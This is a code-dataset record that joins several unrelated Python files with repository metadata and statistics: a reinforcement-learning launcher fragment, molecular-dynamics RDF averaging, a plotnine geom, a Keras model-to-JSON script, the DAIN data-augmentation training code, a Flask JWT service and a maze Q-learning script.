initial_e=parameters.epsilon_start,
e_decays=parameters.epsilon_decay,
e_min=parameters.epsilon_min,
evaluate_on='action',
periodicity=1,
reset_every='none'))
# All previous controllers control the agent during the epochs it goes through. However, we want to interleave a
# "test epoch" between each training epoch ("one of two epochs", hence the periodicity=2). We do not want these
# test epochs to interfere with the training of the agent, which is well established by the TrainerController,
# EpsilonController and the like. Therefore, we will disable these controllers for the whole duration of the test
# epochs interleaved this way, using the controllersToDisable argument of the InterleavedTestEpochController.
# The value of this argument is a list of the indexes of all controllers to disable, their index reflecting the
# order in which they were added. Here, "0" refers to the first attached controller, thus the
# VerboseController; "2" refers to the third attached controller, thus the LearningRateController; etc. The order
# in which the indexes are listed is not important.
# For each test epoch, we also want to display the sum of all rewards obtained, hence the show_score=True.
# Finally, we want to call the summarizePerformance method of Toy_Env every [parameters.period_btw_summary_perfs]
# *test* epochs.
agent.attach(bc.InterleavedTestEpochController(
id=0,
epoch_length=parameters.steps_per_test,
periodicity=1,
show_score=True,
summarize_every=parameters.period_btw_summary_perfs))
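    # Editor's illustrative sketch (hypothetical, not part of this launcher):
    # explicitly disabling the training-time controllers during the interleaved
    # test epochs would use the controllersToDisable argument mentioned above,
    # with indexes following the attach order (0=Verbose, 1=Trainer,
    # 2=LearningRate, 3=DiscountFactor, 4=Epsilon), e.g.
    #     controllersToDisable=[1, 2, 3, 4]
    # passed alongside the other InterleavedTestEpochController arguments.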
# --- Run the experiment ---
agent.run(parameters.epochs, parameters.steps_per_epoch)
| 39.378205
| 120
| 0.689891
| 764
| 6,143
| 5.408377
| 0.33377
| 0.029042
| 0.018877
| 0.015247
| 0.055179
| 0.040658
| 0.023233
| 0
| 0
| 0
| 0
| 0.015886
| 0.221227
| 6,143
| 155
| 121
| 39.632258
| 0.847826
| 0.447664
| 0
| 0.11828
| 0
| 0
| 0.010756
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.096774
| 0
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe44a3208c6d0b6455e3244b9bf2ee35ca9096e2
| 626
|
py
|
Python
|
equilibration/sodium_models/seed_1/post_processing/rdf_calculations.py
|
Dynamical-Systems-Laboratory/IPMCsMD
|
7f0662568d37dce7dcd07b648284aa62991d343c
|
[
"MIT"
] | 2
|
2020-10-30T16:17:01.000Z
|
2021-08-23T13:58:03.000Z
|
equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py
|
atruszkowska/IPMCsMD
|
d3900ea4da453bcc037fd946a2ae61cc67e316f5
|
[
"MIT"
] | null | null | null |
equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py
|
atruszkowska/IPMCsMD
|
d3900ea4da453bcc037fd946a2ae61cc67e316f5
|
[
"MIT"
] | 3
|
2020-09-14T20:42:47.000Z
|
2021-12-13T07:58:16.000Z
|
# ------------------------------------------------------------------
#
# RDF and CN related analysis
#
# ------------------------------------------------------------------
import sys
py_path = '../../../../postprocessing/'
sys.path.insert(0, py_path)
py_path = '../../../../postprocessing/io_operations/'
sys.path.insert(0, py_path)
import cn_and_rdf_lmp as crl
import io_module as io
#
# Input
#
# RDF and CN intput file
rdf_file = '../nafion.rdf'
# Output file
out_file = 'rdf_cn_averaged.txt'
# Number of bins
nbins = 300
# Number of columns
ncols = 10
crl.compute_time_average(rdf_file, out_file, nbins, ncols)
| 17.885714
| 68
| 0.543131
| 77
| 626
| 4.194805
| 0.480519
| 0.074303
| 0.049536
| 0.086687
| 0.123839
| 0.123839
| 0
| 0
| 0
| 0
| 0
| 0.012821
| 0.127796
| 626
| 34
| 69
| 18.411765
| 0.578755
| 0.376997
| 0
| 0.166667
| 0
| 0
| 0.266667
| 0.181333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe463c850bc48b7b739387d099ca1d849b457791
| 1,675
|
py
|
Python
|
venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 1
|
2020-10-02T21:43:06.000Z
|
2020-10-15T22:52:39.000Z
|
venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | null | null | null |
from ..doctools import document
from .geom import geom
from .geom_path import geom_path
from .geom_point import geom_point
from .geom_linerange import geom_linerange
@document
class geom_pointrange(geom):
"""
Vertical interval represented by a line with a point
{usage}
Parameters
----------
{common_parameters}
fatten : float, optional (default: 2)
A multiplicative factor used to increase the size of the
point along the line-range.
"""
DEFAULT_AES = {'alpha': 1, 'color': 'black', 'fill': None,
'linetype': 'solid', 'shape': 'o', 'size': 0.5}
REQUIRED_AES = {'x', 'y', 'ymin', 'ymax'}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity',
'na_rm': False, 'fatten': 4}
@staticmethod
def draw_group(data, panel_params, coord, ax, **params):
geom_linerange.draw_group(data.copy(), panel_params,
coord, ax, **params)
data['size'] = data['size'] * params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_group(data, panel_params, coord, ax, **params)
@staticmethod
def draw_legend(data, da, lyr):
"""
Draw a point in the box
Parameters
----------
data : dataframe
da : DrawingArea
lyr : layer
Returns
-------
out : DrawingArea
"""
geom_path.draw_legend(data, da, lyr)
data['size'] = data['size'] * lyr.geom.params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_legend(data, da, lyr)
return da
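    # Editor's note (illustrative, not part of plotnine): draw_group above
    # multiplies the point size by the 'fatten' parameter, so with the defaults
    # DEFAULT_AES['size'] = 0.5 and fatten = 4 the midpoint is drawn at an
    # effective size of 2.0 on top of the line-range.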
| 29.385965
| 70
| 0.577313
| 194
| 1,675
| 4.835052
| 0.42268
| 0.057569
| 0.063966
| 0.057569
| 0.284648
| 0.202559
| 0.202559
| 0.202559
| 0.127932
| 0.127932
| 0
| 0.004177
| 0.285373
| 1,675
| 56
| 71
| 29.910714
| 0.779449
| 0.216716
| 0
| 0.153846
| 0
| 0
| 0.121084
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.192308
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe468cffe0b2fb47619682741847648e0145af63
| 3,704
|
py
|
Python
|
app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py
|
SummaLabs/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 32
|
2017-09-04T17:40:39.000Z
|
2021-02-16T23:08:34.000Z
|
app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 3
|
2017-10-09T12:52:54.000Z
|
2020-06-29T02:48:38.000Z
|
app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 20
|
2017-10-07T17:29:50.000Z
|
2021-01-23T22:01:54.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import json
import os
import skimage.io as skio
import matplotlib.pyplot as plt
import numpy as np
import keras
from keras.models import Model
from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense
from keras.utils.visualize_util import plot as kplot
##################################
def buildModelCNN(inpShape=(3,128,128), sizFlt = 3, numFltStart=16, numCls=2, numHidden=128, funact='relu'):
inpData = Input(shape=inpShape)
# Conv 1'st
x = Convolution2D(nb_filter=1 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(inpData)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 2'nd
x = Convolution2D(nb_filter=2 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 3'rd
x = Convolution2D(nb_filter=3 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 4'th
x = Convolution2D(nb_filter=4 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 5'th
x = Convolution2D(nb_filter=5 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
#
x = Flatten()(x)
if numHidden is not None:
x = Dense(output_dim=numHidden, activation=funact)(x)
x = Dense(output_dim=numCls, activation='softmax')(x)
retModel = Model(inpData, x)
return retModel
##################################
def getBasicModelTemplate(modelName='model_1'):
retTemplate = {
"class_name": "Model",
"keras_version": keras.__version__,
"config": {
"name": "%s" % modelName,
"layers" : [],
"input_layers": [],
"output_layers": [],
}
}
return retTemplate
def generateModelJsonDict(model):
tmpl = getBasicModelTemplate()
tmpLayers = []
for ii,ll in enumerate(model.layers):
tmp = {
'class_name': type(ll).__name__,
'name': ll.name,
'config': ll.get_config(),
}
if ii==0:
tmp['inbound_nodes'] = []
else:
tmp['inbound_nodes'] = [[
[
model.layers[ii-1].name,
0,
0
]
]]
tmpLayers.append(tmp)
tmpl['config']['layers'] = tmpLayers
tmpl['config']['input_layers'] = [
[
model.layers[0].name,
0,
0
]
]
tmpl['config']['output_layers'] = [
[
model.layers[-1].name,
0,
0
]
]
return tmpl
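# Editor's note (sketch of the dict produced above): every layer entry points
# at its predecessor via inbound_nodes == [[[prev_layer_name, 0, 0]]], forming
# a purely sequential chain, and the first/last layer names are recorded as the
# model's input_layers / output_layers.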
##################################
if __name__ == '__main__':
model = buildModelCNN(inpShape=(3, 128, 128))
fimgModel = 'keras-model-cnn.jpg'
kplot(model, fimgModel, show_shapes=True)
# plt.imshow(skio.imread(fimgModel))
# plt.show()
model.summary()
print ('------')
numLayers = len(model.layers)
for ii,ll in enumerate(model.layers):
print ('[%d/%d] : %s' % (ii, numLayers, ll))
modelJson = generateModelJsonDict(model)
print ('----------------------')
print (json.dumps(modelJson, indent=4))
foutJson = 'test-model-cnn.json'
with open(foutJson, 'w') as f:
json.dump(modelJson, f, indent=4)
# print (json.dumps(modelJson, indent=4))
| 31.389831
| 108
| 0.551026
| 418
| 3,704
| 4.739234
| 0.301435
| 0.04846
| 0.040384
| 0.055528
| 0.341747
| 0.289248
| 0.25896
| 0.229682
| 0.215548
| 0.215548
| 0
| 0.025516
| 0.280508
| 3,704
| 117
| 109
| 31.65812
| 0.717824
| 0.046976
| 0
| 0.145833
| 0
| 0
| 0.085773
| 0.00644
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.09375
| 0
| 0.15625
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4908b1c0b067e1655d4c242e84ebb2602b1af5
| 11,218
|
py
|
Python
|
src/main.py
|
srijankr/DAIN
|
89edec24e63383dfd5ef19f2bfb48d11b75b3dde
|
[
"Apache-2.0"
] | 3
|
2021-08-19T20:11:45.000Z
|
2021-08-23T14:20:11.000Z
|
src/main.py
|
srijankr/DAIN
|
89edec24e63383dfd5ef19f2bfb48d11b75b3dde
|
[
"Apache-2.0"
] | null | null | null |
src/main.py
|
srijankr/DAIN
|
89edec24e63383dfd5ef19f2bfb48d11b75b3dde
|
[
"Apache-2.0"
] | null | null | null |
#@contact Sejoon Oh (soh337@gatech.edu), Georgia Institute of Technology
#@version 1.0
#@date 2021-08-17
#Influence-guided Data Augmentation for Neural Tensor Completion (DAIN)
#This software is free of charge for research purposes.
#For commercial purposes, please contact the main author.
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
import argparse
import numpy as np
from dataset import TensorDataset
import torch.optim as optim
from model import MLP
import pandas as pd
import copy
import random
from sklearn.model_selection import train_test_split
import os
def parse_args():
parser = argparse.ArgumentParser(description="Run DAIN for the MLP architecture")
parser.add_argument('--path', nargs='?', default='data/synthetic_10K.tensor',
help='Input data path.')
parser.add_argument('--epochs', type=int, default=50,
help='Number of epochs.')
parser.add_argument('--batch_size', type=int, default=1024,
help='Batch size.')
parser.add_argument('--layers', nargs='?', default='[150,1024,1024,128]',
help="Size of each layer. Note that the first layer is the concatenation of tensor embeddings. So layers[0]/N (N=order) is the tensor embedding size.")
parser.add_argument('--lr', type=float, default=0.001,
help='Learning rate.')
parser.add_argument('--verbose', type=int, default=5,
help='Show performance per X iterations')
parser.add_argument('--gpu', type=str, default='0',
help='GPU number')
parser.add_argument('--output', type=str, default='demo.txt',
help = 'output name')
parser.add_argument('--train_ratio', type=float, default=0.9,
help = 'Ratio of training data')
return parser.parse_args()
def model_train_and_test(args, model, train_loader, val_loader,test_loader,first):
output_path = 'output/'+args.output
criterion = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr = args.lr)
device = model.device
min_val,min_test,min_epoch,final_model = 9999,9999,0,0
for epoch in range(args.epochs):
torch.cuda.empty_cache()
running_loss = 0.0
train_loss,valid_loss = 0,0
for i, data in enumerate(val_loader, 0):
inputs, labels, indices = data[0].to(device), data[1].to(device),data[2]
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs - labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs,labels)
loss.backward()
valid_loss += loss.item()
del inputs,labels,outputs,model.intermediate
valid_loss /= (i+1)
test_loss, test_accuracy = 0,0
for i, data in enumerate(test_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
prediction = model(inputs).flatten()
loss = criterion(prediction,labels)
loss.backward()
test_accuracy += torch.sum(torch.pow((prediction-labels),2)).cpu().item()
del inputs,labels,prediction,model.intermediate
test_accuracy/=len(test_loader.dataset)
for i, data in enumerate(train_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
optimizer.zero_grad()
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs-labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
del inputs, labels, outputs,indices,model.intermediate
train_loss /= (i+1)
if epoch%args.verbose==0:
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy))
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy),file=open(output_path,"a"),flush=True)
if min_val<=valid_loss and epoch-min_epoch>=10:
break
if min_val>valid_loss:
min_val = valid_loss
min_test = test_accuracy
min_epoch = epoch
final_model = copy.deepcopy(model)
final_model.allgrad = copy.deepcopy(model.allgrad)
final_model.checkpoint = epoch+1
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val))
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val), file=open(output_path, "a"),flush=True)
del model
return min_test,final_model
def data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device):
#Step 4: data augmentation
if new_tensor.shape[0]!=0:
cur_trainset = copy.deepcopy(trainset)
new_indices = torch.zeros(new_tensor.shape[0]).long()
cur_trainset.add(new_tensor,new_val,new_indices)
first = False
#Step 1: tensor embedding learning
else:
cur_trainset = copy.deepcopy(trainset)
first = True
layers = eval(args.layers)
train_loader = DataLoader(cur_trainset, batch_size=args.batch_size,shuffle=True)
model = MLP(cur_trainset, device, layers=layers).to(device)
model.allgrad = []
if first==True:
model.allgrad = torch.zeros(int(args.epochs),len(cur_trainset)+len(val_loader.dataset)+len(test_loader.dataset),model.last_size)
test_rmse,final_model = model_train_and_test(args, model, train_loader, val_loader, test_loader,first)
del cur_trainset
if new_tensor.shape[0]!=0:
del new_tensor
if new_val.shape[0]!=0:
del new_val
del model
if first==True:
print('[DONE] Step 1: tensor embedding learning')
#Step 2: cell importance calculation
train_idx,val_idx,test_idx = train_loader.dataset.indices,val_loader.dataset.indices,test_loader.dataset.indices
checkpoint = final_model.checkpoint
val_grad = torch.sum(final_model.allgrad[:checkpoint,val_idx,:],dim=1).squeeze()
maxv,maxp = -9999,0
final_model.importance = np.zeros(len(trainset))
for (i,idx) in enumerate(trainset.indices):
train_grad = final_model.allgrad[:checkpoint,idx,:].squeeze()
contribution = torch.mul(train_grad,val_grad)
final_contribution = torch.sum(torch.sum(contribution,dim=1),dim=0).item()
final_model.importance[i] = final_contribution
final_model.importance = final_model.importance / max(final_model.importance)
return (test_rmse,final_model)
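# Editor's note (sketch of the influence score computed above, in the names of
# this file): for training cell i,
#     importance[i] = sum_{epoch <= checkpoint} <allgrad[epoch, i, :], val_grad[epoch, :]>
# i.e. the per-epoch dot product between that cell's gradient signal and the
# aggregated validation gradient, later rescaled by the maximum importance.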
def main():
args = parse_args()
path = args.path
layers = eval(args.layers)
learning_rate = args.lr
batch_size = args.batch_size
epochs = args.epochs
verbose = args.verbose
output_path = 'output/'+args.output
if os.path.exists('output/')==False:
os.mkdir('output/')
dataset = TensorDataset(path)
trainset,valset, testset,indices = copy.deepcopy(dataset),copy.deepcopy(dataset),copy.deepcopy(dataset),np.arange(dataset.num_data)
data_train, data_test, labels_train, labels_test, index_train, index_test = train_test_split(dataset.tensor.numpy(), dataset.val.numpy(), indices, test_size=1-args.train_ratio)
data_train, data_val, labels_train, labels_val, index_train, index_val = train_test_split(data_train, labels_train, index_train, test_size=0.2)
trainset.tensor,trainset.val,trainset.num_data,trainset.indices = torch.from_numpy(data_train).long(),torch.from_numpy(labels_train).float(),data_train.shape[0],torch.from_numpy(index_train).long()
valset.tensor,valset.val,valset.num_data,valset.indices = torch.from_numpy(data_val).long(),torch.from_numpy(labels_val).float(),data_val.shape[0],torch.from_numpy(index_val).long()
testset.tensor, testset.val, testset.num_data,testset.indices = torch.from_numpy(data_test).long(), torch.from_numpy(labels_test).float(), data_test.shape[0],torch.from_numpy(index_test).long()
train_loader = DataLoader(trainset, batch_size=batch_size, shuffle=True)
val_loader = DataLoader(valset, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(testset, batch_size=batch_size, shuffle=True)
print('[DONE] Step 0: Dataset loading & train-val-test split')
print(dataset.dimensionality)
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu
# CUDA for PyTorch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(device)
#Step 1&2. Train tensor embeddings & calculate cell importance
(rmse,model) = data_augmentation(trainset,torch.empty(0),torch.empty(0),val_loader,test_loader,args,device)
print('Test RMSE before 50% data augmentation = {}'.format(rmse))
print('Test RMSE before 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
original = copy.deepcopy(model)
del model
cell_importance = abs(original.importance)
print('[DONE] Step 2: cell importance calculation')
#Step 3. entity importance calculation
entity_importance = [np.zeros(dataset.dimensionality[i]) for i in range(dataset.order)]
for i in range(len(cell_importance)):
for j in range(dataset.order):
entity = int(trainset.tensor[i,j])
entity_importance[j][entity] += cell_importance[i]
for i in range(dataset.order):
cur = entity_importance[i]
entity_importance[i] = cur/sum(cur)
print('[DONE] Step 3: entity importance calculation')
num_aug = int(0.5 * trainset.tensor.shape[0])
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)))
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)), file=open(output_path, "a"),flush=True)
#Step 4. perform data augmentation
indices = np.zeros((num_aug,trainset.order))
for i in range(dataset.order):
indices[:,i] = np.random.choice(list(range(0,dataset.dimensionality[i])),size=num_aug,p = entity_importance[i])
new_tensor = torch.from_numpy(indices).long()
new_val = original.predict(new_tensor)
print('[DONE] Step 4: data augmentation with entity importance')
(rmse,model) = data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device)
print('Test RMSE after 50% data augmentation = {}'.format(rmse))
print('Test RMSE after 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
del model
if __name__ == "__main__":
main()
| 45.97541
| 201
| 0.668123
| 1,505
| 11,218
| 4.821262
| 0.168106
| 0.020673
| 0.019294
| 0.013093
| 0.375
| 0.29355
| 0.246692
| 0.213341
| 0.213341
| 0.191428
| 0
| 0.015459
| 0.204225
| 11,218
| 243
| 202
| 46.164609
| 0.797356
| 0.047602
| 0
| 0.179894
| 0
| 0.015873
| 0.125679
| 0.002343
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021164
| false
| 0
| 0.137566
| 0
| 0.174603
| 0.089947
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4b1dcb47180e465318d2ca261b6bc60c83e970
| 1,933
|
py
|
Python
|
backend/app/auth/service.py
|
pers0n4/yoonyaho
|
cf7518667bc7cefff0f9534a5e0af89b261cfed7
|
[
"MIT"
] | null | null | null |
backend/app/auth/service.py
|
pers0n4/yoonyaho
|
cf7518667bc7cefff0f9534a5e0af89b261cfed7
|
[
"MIT"
] | 16
|
2021-04-04T10:58:24.000Z
|
2021-05-23T11:52:08.000Z
|
backend/app/auth/service.py
|
pers0n4/yoonyaho
|
cf7518667bc7cefff0f9534a5e0af89b261cfed7
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
import jwt
from flask import current_app
from app import db
from app.user.repository import UserRepository
class AuthService:
def __init__(self) -> None:
self._user_repository = UserRepository(db.session)
def create_token(self, data) -> dict:
user = self._user_repository.find_one(user_id=data["user_id"])
if user is None:
# user not found
raise RuntimeError
if not user.check_password(data["password"]):
# password
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
refresh_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(hours=4),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token, "refresh_token": refresh_token}
def validate_token(self, token) -> dict:
return jwt.decode(token, current_app.config["SECRET_KEY"], algorithms=["HS512"])
def refresh_token(self, token) -> dict:
payload = self.validate_token(token)
user = self._user_repository.find_one(id=payload["user_id"])
if user is None:
# user not found
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token}
| 30.203125
| 88
| 0.558717
| 201
| 1,933
| 5.174129
| 0.273632
| 0.040385
| 0.061538
| 0.084615
| 0.575
| 0.550962
| 0.495192
| 0.495192
| 0.495192
| 0.495192
| 0
| 0.013107
| 0.329022
| 1,933
| 63
| 89
| 30.68254
| 0.788743
| 0.019659
| 0
| 0.408163
| 0
| 0
| 0.079852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081633
| false
| 0.020408
| 0.102041
| 0.020408
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4c72b51d2a6fb97aa207f15cdf6884d9d32013
| 4,843
|
py
|
Python
|
scripts/qlearn.py
|
kebaek/minigrid
|
3808c1401ea7846febf88d0a2fb2aa39e4a4913f
|
[
"MIT"
] | 5
|
2021-09-29T18:53:37.000Z
|
2022-03-01T08:03:42.000Z
|
scripts/qlearn.py
|
kebaek/minigrid
|
3808c1401ea7846febf88d0a2fb2aa39e4a4913f
|
[
"MIT"
] | null | null | null |
scripts/qlearn.py
|
kebaek/minigrid
|
3808c1401ea7846febf88d0a2fb2aa39e4a4913f
|
[
"MIT"
] | null | null | null |
import _init_paths
import argparse
import random
import time
import utils
import os
from collections import defaultdict
import numpy as np
import csv
from progress.bar import IncrementalBar
from utils.hash import *
def parse_arguments():
parser = argparse.ArgumentParser()
# add arguments
parser.add_argument('--env', type=str, default='../env/maze_2.txt',
help='name of the environment')
parser.add_argument("--dir", type=str, default="",
help="name of the directory to episodes")
parser.add_argument('--num_episode', type=int, default=2000,
help='the number of train episodes')
parser.add_argument('--max_episode_length', type=int, default=200,
help='the maximum of the length of an episode')
parser.add_argument('--lr', type=float, default=0.1,
help='the learning rate of the q learning algorithm')
parser.add_argument('--discount', type=float, default=0.9,
help='the discount factor')
parser.add_argument('--eps', type=float, default=0.8,
help='the value for the eps-greedy strategy')
parser.add_argument('--seed', type=int, default=0,
help='random seed for environment')
# parse arguments
args = parser.parse_args()
return args
def train(maze_env, model_dir, num_episode, max_episode_length, lr,
discount, eps, **kwargs):
# create value function and q value function
q_value_function = {}
visited_actions = {}
visited_states = set()
q_value_function = defaultdict(lambda: 0, q_value_function)
visited_actions = defaultdict(lambda: [False]*maze_env.action_space.n, visited_actions)
# train agent
start = time.time()
episodes_length = []
bar = IncrementalBar('Countdown', max = num_episode)
print("Start to train q value function.")
for _ in range(num_episode):
current_length = 0
is_terminal = 0
obs = maze_env.reset()
state = str(maze_env)
while not is_terminal:
visited_states.add(state)
if random.random() <= eps:
action = random.randint(0, maze_env.action_space.n - 1)
else:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
if False in visited_actions[state]:
action = visited_actions[state].index(False)
else:
action = random.randint(0, maze_env.action_space.n - 1)
visited_actions[state][action] = True
next_obs, reward, is_terminal, info = maze_env.step(action)
next_state = str(maze_env)
current_length += 1
next_action, next_q_value = get_max_action(next_state, q_value_function, maze_env)
max_q_value_target = reward + discount*next_q_value
q_value_function[hash_state_action(state, action)] = (1 - lr) * \
q_value_function[hash_state_action(state, action)] + lr*max_q_value_target
state = next_state
bar.next()
episodes_length.append(current_length)
print("Finish training q value function.")
end = time.time()
bar.finish()
print("[Statistics]: Avg_length {0} and Time {1}s".format(sum(episodes_length) / len(episodes_length), end - start))
# output
print("Start to output q value function and policy to file.")
file = open(model_dir + '/q_value.csv', "w")
fieldnames = ['state', 'action', 'value']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for key, value in q_value_function.items():
state, action = reverse_hashing_state_action(key)
writer.writerow({'state':state, 'action':action, 'value':value})
file.close()
file = open(model_dir + '/policy.csv', "w")
fieldnames = ['state', 'action']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for state in visited_states:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
action = -1
writer.writerow({'state':state, 'action':action})
file.close()
print("Finish outputting q value function to file.")
def main():
# parse arguments
args = parse_arguments()
# create env
maze_env = utils.make_env(args.env, args.seed + 10000)
print('Environment Loaded\n')
model_dir = utils.get_model_dir(args.env + '/' + args.dir + '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d'%(args.lr, args.discount, args.eps, args.num_episode, args.seed))
os.makedirs(model_dir, exist_ok=True)
print(model_dir)
# train agent
train(maze_env, model_dir, **vars(args))
if __name__ == '__main__':
main()
| 38.133858
| 175
| 0.628536
| 617
| 4,843
| 4.726094
| 0.243112
| 0.039095
| 0.067215
| 0.01749
| 0.215706
| 0.159122
| 0.125514
| 0.093964
| 0.066529
| 0.066529
| 0
| 0.010301
| 0.258311
| 4,843
| 126
| 176
| 38.436508
| 0.801503
| 0.026843
| 0
| 0.118812
| 0
| 0
| 0.148597
| 0.009354
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029703
| false
| 0
| 0.108911
| 0
| 0.148515
| 0.069307
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
